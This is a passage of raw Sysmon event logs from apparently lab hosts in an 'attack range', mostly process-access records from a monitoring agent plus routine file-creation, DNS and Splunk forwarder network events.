12:31:22.824{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000019023Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:22.818{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000019022Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:22.808{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000019021Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:22.805{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000019020Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:22.793{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000019019Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:22.786{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000019018Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:22.774{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000019017Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:22.763{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000019016Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:22.752{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000019015Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:22.677{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000019014Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:22.653{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000019013Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:22.607{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000019012Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:22.598{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000019011Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:22.592{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000019010Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:22.582{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000019009Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:22.562{E5A8D418-DC44-63C7-1C00-00000000B002}20203480C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019414190) 10341000x800000000000000019008Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:22.550{E5A8D418-DC44-63C7-1C00-00000000B002}20203480C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019414190) 22542200x800000000000000048776Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:21.259{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304prod.sumo.prod.webservices.mozgcp.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048775Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:21.259{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304prod.sumo.prod.webservices.mozgcp.net034.149.128.2;C:\Program Files\Mozilla Firefox\firefox.exe 23542300x800000000000000048774Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:23.274{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FBB6B5547F98ED2F178F46414EA6064,SHA256=474FAC0F8220D42A34729D98EDBCD394CB3E601191C8E0E2E38EF86CE7A184EE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000019041Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:23.507{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=433B92A5EBD3C9A588361E20AAD5ECE4,SHA256=28D0067A66D8F6DDC7C151CA85E3B0E324F17B4950614E1C59382F542FC9F87E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019040Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:23.192{E5A8D418-DC44-63C7-1B00-00000000B002}1944NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0027b8f3633f25268\channels\health\respondent-20230118114719-042MD5=2BA10D7196373860DD67B47CDBC7ACF2,SHA256=36B87809E8BE9B960CE5E03B4CEC64D52EF7C46D9877F9C3402AB54869FC5CBA,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000019039Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:21.121{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50206-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000019043Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:24.198{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E5D3B2370B87AF1CE4265A33838FE4B,SHA256=03F280AC89C9B646ECDCAB3DF010E2BF08EA5B934A2F1CC1244768DE503A0A84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019042Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:24.195{E5A8D418-DC44-63C7-1B00-00000000B002}1944NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0027b8f3633f25268\channels\health\surveyor-20230118114717-043MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048778Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:24.678{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\2752s6y5.default-release\cache2\doomed\4533MD5=D9C194DCBB73A6B0633F78FA066D5CB6,SHA256=43145A4BF22FBA23EDE5AC51D30D43AE83B7CDA8B7A23373C5796486C33A7141,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048777Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:24.315{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E59BCF4B3721F4FFD429BDF3E92F64AF,SHA256=EB7D88183BF04FD31A3756D2FD2EC873188CF33B30640F26E795710E0761C201,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000019045Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:25.660{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1C00-00000000B002}2020C:\Program Files\Aurora-Agent\aurora-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000019044Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:25.290{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2D8C1D1E85DDF67D6B6398CC3AEFF76,SHA256=0964F3E9AC6656D4A0D2108AADB58D1E652DD458D0B6651913E63A105DFC6A50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048779Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:25.379{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=650B6E19D2C0302632CB241619F137C8,SHA256=4015D9377FC7E563533745FFD7D798A03082DA40516314744D1DA58730F46062,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000019047Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:26.657{E5A8D418-DC43-63C7-0D00-00000000B002}7803800C:\Windows\system32\svchost.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3ca94|c:\windows\system32\rpcss.dll+29447|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000019046Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:26.386{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2797E574050A49974C1290307824071,SHA256=993A54A12BD67AAC06AFB51B2E5F5F0A37B81B8B57C4282EC94D63326DBE9B18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048781Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:26.656{FE4C2B44-D9F5-63C7-1100-00000000AF02}492NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=3DC832F36062E920FDE11E7B15649A08,SHA256=5CAD05DF547A5B58838216269A216FD3D42CD4F46471194CA96306EE56CDF3E1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048780Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:26.427{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73B79EC2A9B971272B5089C7F8315936,SHA256=C68E42C0032A6DAC91EF85D3764AA2A71DA45255EF48D70D8B315C84EFBA6824,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000019048Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:27.468{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3362F23C02546713C7A6463466A2900,SHA256=AB85E57E63003ACE25046607D1D28230085427ADD7F40421C4B615D6511F16F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048784Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:27.906{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B7E616F96B7BBFB82BF7130F79C861FF,SHA256=784F4924BD8FD182C26EA63E1A41C4AA6BD4EA85FEA6DA0417976E9A8570384D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000048783Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:24.617{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56524-false10.0.1.12-8000- 23542300x800000000000000048782Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:27.481{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A7A4529AE54D463DD0C4B00F3DB1E9D,SHA256=B4A9D64725F9D93CB4DF7DA212D73A391032D3649102DCC13766B6E09FEC128E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000019049Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:28.573{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=418E379CB378FC3894996D6A9EDFA9E3,SHA256=C741638630FC23471CF20B3382EEA2662669C726E5D569A70349E4B93473262C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000048794Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:28.778{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E6A0-63C7-A406-00000000AF02}7784C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048793Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 